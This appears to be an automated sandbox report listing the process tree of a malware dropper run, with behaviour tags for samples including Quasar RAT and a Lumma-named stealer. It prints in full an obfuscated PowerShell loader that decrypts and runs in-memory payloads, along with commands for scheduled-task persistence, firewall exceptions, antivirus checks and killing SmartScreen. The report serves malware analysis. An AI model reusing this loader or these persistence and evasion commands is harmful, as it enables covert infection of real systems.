C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"3⤵
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip2⤵
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Quasar RAT
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /13⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}2⤵
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe"2⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\Client-built.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\Client-built.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\mzjfgebm.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\mzjfgebm.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\mzjfgebm.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\mzjfgebm.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 4165⤵
- Program crash
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\new1.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\new1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\lmao.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\lmao.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\NorthSperm.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\NorthSperm.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Surrey Surrey.cmd && Surrey.cmd && exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7195805⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "copehebrewinquireinnocent" Corpus5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Utilize + ..\Verzeichnis + ..\Built + ..\Vessels + ..\Cradle + ..\Jaguar + ..\Comics + ..\Flux + ..\Liberal f5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\719580\Optimum.pifOptimum.pif f5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\tn8cdkzn.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\tn8cdkzn.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\home.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\home.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\SrbijaSetupHokej.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\SrbijaSetupHokej.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-AVRL4.tmp\SrbijaSetupHokej.tmp"C:\Users\Admin\AppData\Local\Temp\is-AVRL4.tmp\SrbijaSetupHokej.tmp" /SL5="$60234,3939740,937984,C:\Users\Admin\Desktop\4363463463464363463463463\Files\SrbijaSetupHokej.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe"C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\solandra.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\solandra.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC22222.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC22222.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\diskutil.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\diskutil.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\wudi.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\wudi.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\test.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\test.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\4363463463464363463463463\Files\test.exe"4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\System32.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\System32.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
\??\c:\users\admin\desktop\4363463463464363463463463\files\system32.exeÂc:\users\admin\desktop\4363463463464363463463463\files\system32.exeÂ4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\Resources\Themes\icsys.icn.exeC:\Windows\Resources\Themes\icsys.icn.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe7⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe9⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 16674010⤵
- Program crash
-
-
-
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe9⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe9⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 56010⤵
- Program crash
-
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe11⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR12⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 410012⤵
- Program crash
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 836 -s 2523568⤵
- Program crash
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\%D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\%D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\cHSzTDjVl.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\cHSzTDjVl.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\zts.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 4764⤵
- Program crash
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463\Files\taskmoder.exe"C:\Users\Admin\Desktop\4363463463464363463463463\Files\taskmoder.exe"3⤵
- Downloads MZ/PE file
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\ProgramData\inxamzulh.vbs"4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im smartscreen.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\Temp\rlnmhaqx.mvv.com"C:\Windows\Temp\rlnmhaqx.mvv.com"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\MemoryDiagnostic.bat" "5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97llXfWIPIQpImNiK5KtBDt3irimGLQPqFnLHvKz0zc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mALtG2O/Bjjfm0ZW7VnQDw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ErlSt=New-Object System.IO.MemoryStream(,$param_var); $nTyeT=New-Object System.IO.MemoryStream; $VikMi=New-Object System.IO.Compression.GZipStream($ErlSt, [IO.Compression.CompressionMode]::Decompress); $VikMi.CopyTo($nTyeT); $VikMi.Dispose(); $ErlSt.Dispose(); $nTyeT.Dispose(); $nTyeT.ToArray();}function execute_function($param_var,$param2_var){ $EmxPf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rHhiw=$EmxPf.EntryPoint; $rHhiw.Invoke($null, $param2_var);}$XUJev = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\MemoryDiagnostic.bat';$host.UI.RawUI.WindowTitle = $XUJev;$cDIGC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XUJev).Split([Environment]::NewLine);foreach ($kZWrm in $cDIGC) { if ($kZWrm.StartsWith('dneCvjYTeJjwRzOmlRHQ')) { $eHXXx=$kZWrm.Substring(20); break; }}$payloads_var=[string[]]$eHXXx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_112_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_112.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_112.vbs"7⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_112.bat" "8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97llXfWIPIQpImNiK5KtBDt3irimGLQPqFnLHvKz0zc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mALtG2O/Bjjfm0ZW7VnQDw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ErlSt=New-Object System.IO.MemoryStream(,$param_var); $nTyeT=New-Object System.IO.MemoryStream; $VikMi=New-Object System.IO.Compression.GZipStream($ErlSt, [IO.Compression.CompressionMode]::Decompress); $VikMi.CopyTo($nTyeT); $VikMi.Dispose(); $ErlSt.Dispose(); $nTyeT.Dispose(); $nTyeT.ToArray();}function execute_function($param_var,$param2_var){ $EmxPf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rHhiw=$EmxPf.EntryPoint; $rHhiw.Invoke($null, $param2_var);}$XUJev = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_112.bat';$host.UI.RawUI.WindowTitle = $XUJev;$cDIGC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XUJev).Split([Environment]::NewLine);foreach ($kZWrm in $cDIGC) { if ($kZWrm.StartsWith('dneCvjYTeJjwRzOmlRHQ')) { $eHXXx=$kZWrm.Substring(20); break; }}$payloads_var=[string[]]$eHXXx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "9⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
-
-
-
-
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 10325⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
